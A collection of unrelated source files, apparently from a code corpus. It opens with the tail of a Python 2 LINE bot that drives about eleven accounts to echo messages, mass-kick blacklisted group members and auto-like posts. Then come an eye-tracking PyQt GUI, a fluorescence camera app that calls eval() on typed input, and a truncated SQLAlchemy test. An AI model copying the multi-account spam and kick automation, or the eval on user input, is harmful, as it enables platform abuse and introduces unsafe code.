klist=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
N=random.choice(klist)
N.sendText(msg.to,"I am Ready 😎")
#-----------------------------------------------
elif "Say " in msg.text:
string = msg.text.replace("Say ","")
if len(string.decode('utf-8')) <= 50:
ki.sendText(msg.to," " + string + " ")
kk.sendText(msg.to," " + string + " ")
kc.sendText(msg.to," " + string + " ")
kb.sendText(msg.to," " + string + " ")
kd.sendText(msg.to," " + string + " ")
ke.sendText(msg.to," " + string + " ")
kf.sendText(msg.to," " + string + " ")
kg.sendText(msg.to," " + string + " ")
kh.sendText(msg.to," " + string + " ")
kj.sendText(msg.to," " + string + " ")
kk.sendText(msg.to," " + string + " ")
kc.sendText(msg.to," " + string + " ")
#-----------------------------------------------
elif msg.text in ["respon","Respon"]:
ki.sendText(msg.to,"™ 1 Hadiirrr")
kk.sendText(msg.to,"™ 2 Hadirrr")
kc.sendText(msg.to,"™ 3 Hadirrr")
kb.sendText(msg.to,"™ 4 Hadiirrr")
kd.sendText(msg.to,"™ 5 Hadirrr")
ke.sendText(msg.to,"™ 6 Hadirrr")
kg.sendText(msg.to,"™ 7 Hadiirrr")
kh.sendText(msg.to,"™ 8 Hadirrr")
kj.sendText(msg.to,"™ 9 Hadirrr")
kf.sendText(msg.to,"™ 10 Hadiirrr")
kf.sendText(msg.to,"======[ DONE BOS ]======")
#-----------------------------------------------
elif msg.text in ["Your name","your name"]:
G = ki.getProfile()
X = G.displayName
Y = kk.getProfile()
Z = Y.displayName
A = kc.getProfile()
B = A.displayName
ki.sendText(msg.to,X)
kk.sendText(msg.to,Z)
kc.sensText(msg.to,B)
elif msg.text in ["Sp","Speed","speed"]:
start = time.time()
cl.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
#------------------------------------------------------------------
elif msg.text in ["Ban"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact")
# ki.sendText(msg.to,"send contact")
# kk.sendText(msg.to,"send contact")
# kc.sendText(msg.to,"send contact")
elif msg.text in ["Unban"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact")
# ki.sendText(msg.to,"send contact")
# kk.sendText(msg.to,"send contact")
# kc.sendText(msg.to,"send contact")
elif msg.text in ["Banlist"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
# ki.sendText(msg.to,"nothing")
# kk.sendText(msg.to,"nothing")
# kc.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "~ " +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
# ki.sendText(msg.to,mc)
# kk.sendText(msg.to,mc)
elif msg.text in ["Cek ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["Seeyou"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
ki.sendText(msg.to,"There was no blacklist user")
kk.sendText(msg.to,"There was no blacklist user")
kc.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
kk.kickoutFromGroup(msg.to,[jj])
kc.kickoutFromGroup(msg.to,[jj])
cl.sendText(msg.to,"Blacklist user")
ki.sendText(msg.to,"Blacklist user")
kk.sendText(msg.to,"Blacklist user")
elif msg.text in ["Cancel!"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"😨😨😨😨😨")
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
if op.type == 59:
print op
except Exception as error:
print error
def autoSta():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ki.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kk.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kc.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kb.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kd.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ke.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kf.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kg.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kh.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread1 = threading.Thread(target=autoSta)
thread1.daemon = True
thread1.start()
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(500)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
receiver.py
|
from collections import deque
from enum import Flag
from os import read
from threading import Thread
import cv2 as cv
from net import connection
frames = deque()
def get():
if (len(frames)>0):
return frames.popleft()
else:
return None
def save(frame):
# import cv2 as cv
# with open("rec.jpg", 'wb') as writer:
# writer.write(frame)
frames.append(frame)
def init(con : connection):
def loop(con : connection):
while True:
frame = con.recv(decode=False)
save(frame)
Thread(target=loop, args=(con,), daemon=False).start()
|
main.py
|
#!/usr/bin/env python3
import os
import sys
import cv2
import copy
import pathlib
import threading
import shutil
import numpy as np
import pyqtgraph as pg
import pandas as pd
from plotting import auto_draw
from preProcess import preprocess
from pupil_tracker import auto_tracker
from glint_tracker import g_auto_tracker
from rationalize import rationalize
from pyqtgraph import PlotWidget
from Interface.user import MyWidget
from PyQt5.QtGui import QIcon, QPixmap
from video_construct import video_construct
from PyQt5 import uic, QtCore, QtGui, QtWidgets
from Interface.video_player import VideoPlayer
from util import mkmessage, get_ROI, get_center
class main(QtWidgets.QMainWindow):
def __init__(self, video = None, file = None):
#Dictionary including index and picture for each
super().__init__()
'''
User interactive widget
'''
self.MyWidget = None
'''
Variables for the best image chosen at the beginning
'''
self.pic_collection = {}
self.wanted_pic = None
'''
Variables that get the class of the tracker
'''
self.track_pupil = None
self.track_glint = None
'''
Variables that store the user entered data
'''
self.Video = None
self.File = None
'''
Variable stored for dynamic plotting
'''
self.current_plot = 0
self.orgdata = None
'''
(start_x, end_x, start_y, end_y)
Variables that show the cropping factor chosen by the user
'''
self.cropping_factor_pupil = [[0,0],[0,0]]
self.cropping_factor_glint = [[0,0],[0,0]]
'''
Variables that get the perfect glint tracking data
'''
self.pupil_blur = None
self.H_count = None
self.threshold_range_glint = None
'''
cue, vgs, dly, mgs
iti is omitted and could be added in mgs
'''
self.stare_posi = {'cue':[], 'vgs':[], 'dly':[], 'mgs':[]}
'''
Load the user interface
'''
uic.loadUi('Interface/dum.ui', self)
self.setWindowTitle('Pupil Tracking')
self.Pupil_click.setEnabled(False)
self.Glint_click.setEnabled(False)
self.Pupil_chose.setEnabled(False)
self.Glint_chose.setEnabled(False)
self.Sync.setEnabled(False)
self.Plotting.setEnabled(False)
self.Analyze.setEnabled(False)
self.Pupil_chose.toggled.connect(self.circle_pupil)
self.Glint_chose.toggled.connect(self.circle_glint)
self.Pupil_click.clicked.connect(self.store_pupil)
self.Glint_click.clicked.connect(self.store_glint)
self.Sync.clicked.connect(self.synchronize_data)
self.Plotting.clicked.connect(self.plot_result)
self.Generate.clicked.connect(self.generate)
self.Analyze.clicked.connect(self.analyze)
'''
Get or set two user entered values
'''
self.VideoText.setText('input/run3.mov')
self.FileText.setText('input/10997_20180818_mri_1_view.csv')
#Create the data output directory
try:
os.mkdir('data_output')
except OSError:
print ("Creation of the directory failed")
'''
Initialize the dynamic plot
'''
self.data = {'r':[0]*500, 'x':[0]*500, 'y':[0]*500, 'blink':[0]*500, 'index':list(range(0, 500))}
self.r_line = self.r_plot.plot(self.data['index'], self.data['r'])
self.x_line = self.x_plot.plot(self.data['index'], self.data['x'])
self.y_line = self.y_plot.plot(self.data['index'], self.data['y'])
self.blink_line = self.blink.plot(self.data['index'], self.data['blink'])
self.timer = QtCore.QTimer()
self.timer.setInterval(60)
self.timer.timeout.connect(self.update_plot_data)
self.timer.start()
self.show()
'''
This one synchronizes original data from the tracker data
'''
def synchronize_data(self):
usable_file_pupil = 'data_output/filter_pupil.csv'
usable_file_glint = 'data_output/filter_glint.csv'
pupil_save = "data_output/rationalized_pupil.csv"
glint_save = "data_output/rationalized_glint.csv"
#Check for availability
try:
pd.read_csv(usable_file_pupil)
pd.read_csv(usable_file_glint)
except:
print("Data Not ready yet!!!!!")
return
#Print the pupil
data_sync_pupil = rationalize(self.File, usable_file_pupil, pupil_save)
data_sync_pupil.rationalized_output()
data_sync_glint = rationalize(self.File, usable_file_glint, glint_save)
data_sync_glint.rationalized_output()
'''
Function that handles <static> plotting by first read in available data from csv file
'''
def orgdata_handle(self):
self.orgdata = pd.read_csv(self.File)
#Multiply 60 each because it is 60f/s
self.stare_posi['cue'] = self.orgdata['cue']*60
self.stare_posi['vgs'] = self.orgdata['vgs']*60
self.stare_posi['dly'] = self.orgdata['dly']*60
self.stare_posi['mgs'] = self.orgdata['mgs']*60
'''
Function that handles <dynamic plotting> by updating with the data
'''
def update_plot_data(self):
if self.track_pupil is not None:
#Enable data synchronization as well
self.Sync.setEnabled(True)
#Need to literally updateing the list by first removing the first
self.data['r'] = self.data['r'][1:]
self.data['x'] = self.data['x'][1:]
self.data['y'] = self.data['y'][1:]
self.data['blink'] = self.data['blink'][1:]
self.data['index'] = self.data['index'][1:]
try:
self.data['r'].append(self.track_pupil.r_value[self.current_plot])
self.data['x'].append(self.track_pupil.x_value[self.current_plot])
self.data['y'].append(self.track_pupil.y_value[self.current_plot])
self.data['blink'].append(self.track_pupil.blink_rate[self.current_plot])
self.data['index'].append(self.data['index'][-1] + 1) # Add a new value 1 higher than the last.
except IndexError:
pass
#Do the error filter, check the length match
if(len(self.data['r']) < len(self.data['index'])):
self.data['r'].append(self.data['r'][-1])
if(len(self.data['x']) < len(self.data['index'])):
self.data['x'].append(self.data['x'][-1])
if(len(self.data['y']) < len(self.data['index'])):
self.data['y'].append(self.data['y'][-1])
if(len(self.data['blink']) < len(self.data['index'])):
self.data['blink'].append(self.data['blink'][-1])
#Update the data for dynamic plotting
self.r_line.setData(self.data['index'], self.data['r'])
self.x_line.setData(self.data['index'], self.data['x'])
self.y_line.setData(self.data['index'], self.data['y'])
self.blink_line.setData(self.data['index'], self.data['blink'])
#Update the current index
self.current_plot += 1
'''
Function that calls pupil tracker through multi-threading
'''
def pupil_tracking(self, ROI, parameters, p_glint):
#Initialize the eye_tracker for pupil
self.track_pupil = auto_tracker(self.Video, ROI, parameters, p_glint)
self.track_pupil.set_events(self.File)
self.track_pupil.run_tracker()
'''
Function that calls glint tracker through multi-threading
'''
def glint_tracking(self, ROI, CPI, parameters_glint):
#Initialize the eye_tracker for glint
self.track_glint = g_auto_tracker(self.Video, ROI, CPI, parameters_glint)
self.track_glint.set_events(self.File)
self.track_glint.run_tracker()
def clear_folder(self, folder):
''' Clear every thing in the folder
@param folder - directory to remove and remake
No need to make it a button. input dir should be exploratory data
This has a nice side effect:
On first run, output directories dont exist. This creates them
'''
if os.path.exists(folder):
shutil.rmtree(folder)
return
os.makedirs(folder)
'''
Preprocess function to get the pupil threshold
'''
def pupil_threshold(self, center, sf, CPI, parameters):
pre_pupil_threshold = preprocess(center, sf, CPI, parameters['blur'], parameters['canny'])
return pre_pupil_threshold.start()
'''
Preprocess function to get the glint threshold
'''
def glint_threshold(self, center, sf, CPI, parameters):
pre_glint_threshold= preprocess(center, sf, CPI, parameters['blur'], parameters['canny'])
return pre_glint_threshold.d_glint()
'''
Preprocess function to get the pupil blur
'''
def get_blur(self, sf, CPI, parameters, ROI_pupil, ROI_glint):
pre_pupil_blur = preprocess(None, sf, CPI, parameters['blur'], parameters['canny'])
self.pupil_blur = pre_pupil_blur.anal_blur(ROI_pupil, ROI_glint, self.Video)
'''
So Hough transform need a count variable, this one calculates the perfect counts for glint
'''
def get_count(self, sf, ROI, CPI, parameters):
glint_CPI = copy.deepcopy(CPI)
preprocess_glint = preprocess(None, sf, glint_CPI, parameters['blur'], parameters['canny'])
self.H_count = preprocess_glint.g_count(ROI, glint_CPI, parameters, self.Video)
'''
This function calls the preprocess and calls the actual trackers
'''
def analyze(self):
'''
Pre-define the parameters that would later be passed into the tracker
'''
parameters_pupil = {'blur': (20, 20), 'canny': (40, 50), 'stare_posi':None}
parameters_glint = {'blur': (1, 1), 'canny': (40, 50), 'H_count': 8, 'stare_posi':None}
'''
We need both CPI and ROI, the difference is that ROI is the displacement
and CPI is the new position for both x and y
'''
ROI_pupil = get_ROI(self.cropping_factor_pupil)
ROI_glint = get_ROI(self.cropping_factor_glint)
CPI_pupil = self.cropping_factor_pupil
CPI_glint = self.cropping_factor_glint
# We also need the center of pupil and glint based on user-chosen area
center_pupil = get_center(ROI_pupil)
center_glint = get_center(ROI_glint)
# check user has draw roi boxes for both pupil and glint
# without these, we cannot continue. will hit excpetions below
for cntr in [center_pupil, center_glint]:
if cntr[0] == 0 and cntr[1] == 0:
mkmessage('Draw ROI boxes for both pupil and glint!')
return
'''
Enable the interface button
'''
self.Analyze.setEnabled(False)
self.Plotting.setEnabled(True)
'''
This is for pre-processing
'''
#Pre_calculate the perfect threshold for glint detection
self.threshold_range_glint = self.glint_threshold(center_glint, 1, CPI_glint, parameters_glint)
parameters_glint['threshold'] = self.threshold_range_glint
print("first pass pass parameters")
print(f" pupil: {parameters_pupil}")
print(f" glint: {parameters_glint}")
#Propress the blurring factor for pupil
t1 = threading.Thread(target = self.get_blur, args = (4, CPI_pupil, parameters_pupil, ROI_pupil, ROI_glint))
#Get the count for hough transform
t2 = threading.Thread(target = self.get_count, args = (1, ROI_glint, CPI_glint, parameters_glint))
#Run the thread
t1.start()
t2.start()
t1.join()
t2.join()
'''
This is for pre-processsing as well....
'''
#4 is the shrinking factor that could boost up the speed
th_range_pupil = self.pupil_threshold(center_pupil, 4, CPI_pupil, parameters_pupil)
#Add the perfect blurrin factor for pupil
parameters_pupil['blur'] = self.pupil_blur
#Add the perfect threshold value
parameters_pupil['threshold'] = th_range_pupil
#Add the perfect H_count value for glint. Pupil doesn't need this
parameters_glint['H_count'] = self.H_count
#Put in the ideal staring position that might be used in the tracker portion
parameters_pupil['stare_posi'] = self.stare_posi
parameters_glint['stare_posi'] = self.stare_posi
# useful to know for e.g. ./tracker.py
print("second pass parameters")
print(f" pupil: {parameters_pupil}")
print(f" glint: {parameters_glint}")
#Create the thread for both pupil and glint
#No need to join because i don't want the user interface to freeze
t2 = threading.Thread(target=self.pupil_tracking, args=(ROI_pupil, parameters_pupil, ROI_glint))
t3 = threading.Thread(target=self.glint_tracking, args=(ROI_glint, CPI_glint, parameters_glint))
#Start the thread for final calculation
t2.start()
t3.start()
'''
Function that clear all the testing data
'''
def clear_testing(self):
self.clear_folder("./output")
self.clear_folder("./glint_output")
self.clear_folder("./glint_testing")
self.clear_folder("./testing")
'''
This function generate the chosen picture for the user to select their prefered area
'''
def generate(self):
#Enable all the functional buttons
self.Analyze.setEnabled(True)
self.Generate.setEnabled(False)
self.Pupil_chose.setEnabled(True)
self.Glint_chose.setEnabled(True)
#Clase all the testing variables. No other use but testing
self.clear_testing()
#Check the validity of two files entered
self.Video = self.VideoText.text()
self.File = self.FileText.text()
if not os.path.exists(self.Video): #or not os.path.exists(File):
print(f"Video file '{self.Video}' does not exist")
return
if not os.path.exists(self.File):
print(f"Text file '{self.File}' does not exist")
return
#Create a thread to break down video into frames into out directory
t1 = threading.Thread(target=self.to_frame, args=(self.Video, None))
#Read in the original data file, maybe it has some uses later?
self.orgdata_handle()
# disable line editing once we've picked our files to avoid confusion
self.VideoText.setEnabled(False)
self.FileText.setEnabled(False)
#Get and save the best picture for the user to crop
self.wanted_pic = self.to_frame(self.Video)
if self.wanted_pic != None:
sample = self.pic_collection[self.wanted_pic]
cv2.imwrite('input/chosen_pic.png', sample)
#Set the text in the interface to tell the user it's time to carry on
self.label_5.setText("Generating done, choose(Pupil/Glint)")
'''
For user to choose pupil in the interface
'''
def circle_pupil(self):
#Fist clear every widgets in the layout
for i in reversed(range(self.LayVideo.count())):
self.LayVideo.itemAt(i).widget().setParent(None)
#Then set the new widget
self.Pupil_click.setEnabled(True)
self.Glint_click.setEnabled(False)
self.MyWidget = MyWidget(self)
self.LayVideo.addWidget(self.MyWidget)
'''
For user to choose glint in the interface
'''
def circle_glint(self):
#Fist clear every widgets in the layout
for i in reversed(range(self.LayVideo.count())):
self.LayVideo.itemAt(i).widget().setParent(None)
#Then set the new widget
self.Pupil_click.setEnabled(False)
self.Glint_click.setEnabled(True)
self.MyWidget = MyWidget(self)
self.LayVideo.addWidget(self.MyWidget)
'''
Store every variables corresponding to the pupil chosen by the user
'''
def store_pupil(self):
input_d = {
"name": self.cropping_factor_pupil,
"data": (self.p_x, self.p_xl, self.p_y, self.p_yl)
}
self.Pupil_store.setText('Pupil: Stored')
self.store_fun(input_d)
'''
Store every variables corresponding to the glint chosen by the user
'''
def store_glint(self):
input_d = {
"name": self.cropping_factor_glint,
"data": (self.g_x, self.g_xl, self.g_y, self.g_yl)
}
self.Glint_store.setText('Glint: Stored')
self.store_fun(input_d)
def store_fun(self, input = None):
self.Glint_store.setText('Glint: Stored')
inner_count = 0
action = (
self.MyWidget.begin.x(),
self.MyWidget.end.x(),
self.MyWidget.begin.y(),
self.MyWidget.end.y()
)
text = ('x: ', 'xl: ', 'y: ', 'yl: ')
for i in range(0, 2):
for j in range(0, 2):
input["name"][i][j] = action[inner_count]
input["data"][inner_count].setText(text[inner_count] + str(action[inner_count]))
inner_count += 1
'''
Function that statically plot the tracking results to the file "plotting" for developer inspection
'''
def plot_result(self):
#Plot glint
ad = auto_draw(self.stare_posi)
#Original Pupil
ad.read('data_output/origin_pupil.csv')
ad.draw_x('plotting/origin_x_pupil.png')
ad.draw_y('plotting/origin_y_pupil.png')
ad.draw_r('plotting/origin_r_pupil.png')
ad.draw_blink('plotting/blink_pupil.png')
#filtered Pupil
af = auto_draw(self.stare_posi)
af.read('data_output/filter_pupil.csv')
af.draw_x('plotting/filtered_x_pupil.png')
af.draw_y('plotting/filtered_y_pupil.png')
af.draw_r('plotting/filtered_r_pupil.png')
ag = auto_draw(self.stare_posi)
ag.read('data_output/origin_glint.csv')
ag.draw_x('plotting/origin_x_glint.png')
ag.draw_y('plotting/origin_y_glint.png')
ag.draw_r('plotting/origin_r_glint.png')
fg = auto_draw(self.stare_posi)
fg.read('data_output/filter_glint.csv')
fg.draw_x('plotting/filtered_x_glint.png')
fg.draw_y('plotting/filtered_y_glint.png')
fg.draw_r('plotting/filtered_r_glint.png')
'''
Function to choose the best eye picture for user to crop
'''
def to_frame(self, video, limit = 300):
maximum = 0
wanted = 0
#i counts the image sequence generated from the video file
i = 0
cap = cv2.VideoCapture(video)
while(cap.isOpened()):
ret, frame = cap.read()
if ret == False:
break
if limit != None:
#Test for the non-blinking image(Find image with the larggest dark space)
if len(np.where(frame < 100)[0]) > maximum and i < limit:
maximum = len(np.where(frame < 100)[0])
wanted = i
#Add a limit to it so it could run faster when testing
#We need a perfect opened_eye to run machine learning program on to determine the parameters.
if i > limit:
return wanted
self.pic_collection[i] = frame
if i % 25 == 0:
print("%d/%d(max) image scanned" % (i,limit))
else:
cv2.imwrite('output/%015d.png'%i, frame)
i+=1
return wanted
if __name__ == '__main__':
#Later put into the user interface
App = QtWidgets.QApplication([])
WINDOW = main()
sys.exit(App.exec_())
|
RUN_ME_Flouroscence.py
|
#########
#Imports#
#########
# Python Basics
import sys
import os
import ast
from threading import Thread
import time
# Interfacing
if sys.version_info[0] == 3: # for Python3
import tkinter as tk
else: # for Python2
import Tkinter as tk
# Image process
import PIL.Image, PIL.ImageTk
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
# Secondary Script
from Secondary_Scripts.VideoCapture import VideoCapture
from Secondary_Scripts.Flouroscence import Flouro
# Initialisation Parameters
import Parameters as para
###########
#Operation#
###########
class App:
def __init__(self, window_title):
self.window = tk.Tk()
self.window.wm_title(window_title)
# open video source (by default this will try to open the computer webcam)
self.vid = VideoCapture()
# initialise flouroscence plot
self.floursize = para.floursize
self.flour = Flouro(self.floursize, self.floursize)
self.cropdimension = para.cropdimension
# File saving setting
self.save_dir = para.save_dir # the saving directory has to first be created already
def dir_update(event):
self.save_dir = dir_entry.get()
dir_res.configure(text='dir = ' + self.save_dir)
tk.Label(self.window, text='Save Directory', font='Helvetica 12 bold').grid(row=0, column=0)
dir_entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value=self.save_dir))
dir_entry.bind("<Return>", dir_update)
dir_entry.grid(row=1, column=0)
dir_res = tk.Label(self.window, text='dir = ' + self.save_dir)
dir_res.grid(row=2, column=0)
def file_update(event):
frame = self.vid.get_frame()
save_filename = file_entry.get()
save_name = self.save_dir + save_filename
frame_image = PIL.Image.fromarray(frame)
frame_image.save(os.path.join(self.save_dir, save_filename))
file_res.configure(text='file saved at: ' + save_name)
file_entry.delete(0, tk.END)
file_entry.insert(0, '.bmp')
tk.Label(self.window, text='Save filename', font='Helvetica 12 bold').grid(row=3, column=0)
file_entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value='.bmp'))
file_entry.bind("<Return>", file_update)
file_entry.grid(row=4, column=0)
file_res = tk.Label(self.window, text='file not saved')
file_res.grid(row=5, column=0)
# Exposure Time setting
def evaluate(event):
ExposureTime = eval(entry.get())
self.vid.c0.ExposureTime = ExposureTime
exposure_res.configure(text='Exposure Time [us] = ' + str(eval(entry.get())))
tk.Label(self.window, text="Limit=39 to 6.71089e+07").grid(row=2, column=1)
entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value=str(self.vid.c0.ExposureTime)))
entry.bind("<Return>", evaluate)
entry.grid(row=1, column=1)
exposure_res = tk.Label(self.window, text='Exposure Time [us] = ' + str(self.vid.c0.ExposureTime), font='Helvetica 12 bold')
exposure_res.grid(row=0, column=1)
# crop location setting
self.cropLoc = para.cropLoc_flouro
def cropLoc_update(event):
self.cropLoc = ast.literal_eval(cropLoc_entry.get())
cropLoc_res.configure(text='Crop Location = ' + str(self.cropLoc))
cropLoc_entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value=str(self.cropLoc)))
cropLoc_entry.bind("<Return>", cropLoc_update)
cropLoc_entry.grid(row=4, column=1)
cropLoc_res = tk.Label(self.window, text='Crop Location = ' + str(self.cropLoc), font='Helvetica 12 bold')
cropLoc_res.grid(row=3, column=1)
# crop dimension setting
def cropdimension_update(event):
self.cropdimension = ast.literal_eval(cropdimension_entry.get())
cropdimension_res.configure(text='Crop Dimensions = ' + str(self.cropdimension))
cropdimension_entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value=str(self.cropdimension)))
cropdimension_entry.bind("<Return>", cropdimension_update)
cropdimension_entry.grid(row=1, column=2)
cropdimension_res = tk.Label(self.window, text='Crop Dimensions = ' + str(self.cropdimension), font='Helvetica 12 bold')
cropdimension_res.grid(row=0, column=2)
# Entries for flouroscence y limit
self.ylim = para.ylim
def ylim_update(event):
self.ylim = ast.literal_eval(ylim_entry.get())
ylim_res.configure(text='Y Limit = ' + str(self.ylim))
self.flour.ax.set_ylim(self.ylim)
ylim_entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value=str(self.ylim)))
ylim_entry.bind("<Return>", ylim_update)
ylim_entry.grid(row=1, column=3)
ylim_res = tk.Label(self.window, text='Y Limit = ' + str(self.ylim), font='Helvetica 12 bold')
ylim_res.grid(row=0, column=3)
# Entries for flouroscence y limit
self.xlim = para.xlim
def xlim_update(event):
self.xlim = ast.literal_eval(xlim_entry.get())
xlim_res.configure(text='Y Limit = ' + str(self.xlim))
xlim_entry = tk.Entry(self.window, textvariable=tk.StringVar(self.window, value=str(self.xlim)))
xlim_entry.bind("<Return>", xlim_update)
xlim_entry.grid(row=4, column=3)
xlim_res = tk.Label(self.window, text='X Limit = ' + str(self.xlim), font='Helvetica 12 bold')
xlim_res.grid(row=3, column=3)
# Value for sum
tk.Label(self.window, text='Flouroscence Sum = ', font='Helvetica 12 bold').grid(row=3, column=2)
self.flourSum_res = tk.Label(self.window, text='0E0', font='Helvetica 12 bold')
self.flourSum_res.grid(row=4, column=2)
# Create a canvas that can fit the above video source size
scale = para.scale_flouro
self.width, self.height = int(scale * 1262), int(scale * 964)
self.canvas_img = tk.Canvas(self.window, width=self.width, height=self.height)
self.canvas_img.grid(row=6, column=0, columnspan=2, rowspan=2)
# Create a canvas that can fit the slice plot
self.canvas_flour = FigureCanvasTkAgg(self.flour.fig, master=self.window)
self.canvas_flour.get_tk_widget().grid(row=6, column=2, columnspan=2, rowspan=2)
# for performance testing
self.time = time.time()
self.old_time = self.time
# Starting threads of processes
thread1 = Thread(target=self.operate_camera)
thread2 = Thread(target=self.update_feed)
thread3 = Thread(target=self.update_flouro)
thread1.start()
thread2.start()
thread3.start()
self.window.mainloop()
# operate camera
def operate_camera(self):
while True:
self.vid.operate_camera()
# self.old_time = self.time
# self.time = time.time()
# print(self.time-self.old_time)
# update for video_feed
def update_feed(self):
while True:
frame = self.vid.get_frame()
feed_frame = self.flour.get_feed(frame, self.cropLoc, self.cropdimension, self.width, self.height)
# Creating display image
self.photo = PIL.ImageTk.PhotoImage(image=feed_frame)
self.canvas_img.create_image(0, 0, image=self.photo, anchor=tk.NW)
time.sleep(para.timesleep)
# self.old_time = self.time
# self.time = time.time()
# print(self.time-self.old_time)
# update for flouroscence plot
def update_flouro(self):
while True:
# Get a frame from the video source
frame = self.vid.get_frame()
# Get update
self.flour.get_plot(frame, self.cropLoc, self.cropdimension, self.xlim, self.flourSum_res)
# self.old_time = self.time
# self.time = time.time()
# print(self.time-self.old_time)
#####
#Run#
#####
# Create a window and pass it to the Application object
app = App("Flouroscence")
|
test_engine_py3k.py
|
import asyncio
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import delete
from sqlalchemy import event
from sqlalchemy import exc
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import union_all
from sqlalchemy.ext.asyncio import async_engine_from_config
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio import engine as _async_engine
from sqlalchemy.ext.asyncio import exc as asyncio_exc
from sqlalchemy.ext.asyncio.base import ReversibleProxy
from sqlalchemy.ext.asyncio.engine import AsyncConnection
from sqlalchemy.ext.asyncio.engine import AsyncEngine
from sqlalchemy.pool import AsyncAdaptedQueuePool
from sqlalchemy.testing import assertions
from sqlalchemy.testing import async_test
from sqlalchemy.testing import combinations
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing import ne_
from sqlalchemy.util.concurrency import greenlet_spawn
class AsyncFixture:
@config.fixture(
params=[
(rollback, run_second_execute, begin_nested)
for rollback in (True, False)
for run_second_execute in (True, False)
for begin_nested in (True, False)
]
)
def async_trans_ctx_manager_fixture(self, request, metadata):
rollback, run_second_execute, begin_nested = request.param
from sqlalchemy import Table, Column, Integer, func, select
t = Table("test", metadata, Column("data", Integer))
eng = getattr(self, "bind", None) or config.db
t.create(eng)
async def run_test(subject, trans_on_subject, execute_on_subject):
async with subject.begin() as trans:
if begin_nested:
if not config.requirements.savepoints.enabled:
config.skip_test("savepoints not enabled")
if execute_on_subject:
nested_trans = subject.begin_nested()
else:
nested_trans = trans.begin_nested()
async with nested_trans:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
# for nested trans, we always commit/rollback on the
